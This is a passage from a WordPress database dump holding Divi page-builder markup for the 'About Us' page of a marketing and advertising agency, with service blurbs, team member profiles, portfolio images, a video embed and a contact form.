gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"Dhiraj\" title_text=\"Founder WhatTheHell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Shubham\" title_text=\"Artboard (2)\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-08 20:49:59','2020-08-08 20:49:59','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/392-revision-v1/',0,'revision','',0),(730,1,'2020-08-08 20:51:22','2020-08-08 20:51:22','Founder WhatTheHell?','Founder WhatTheHell?','Founder WhatTheHell?','inherit','open','closed','','artboard-copy-6-1','','','2020-08-08 20:51:41','2020-08-08 20:51:41','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg',0,'attachment','image/jpeg',0),(731,1,'2020-08-08 20:51:52','2020-08-08 20:51:52','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" 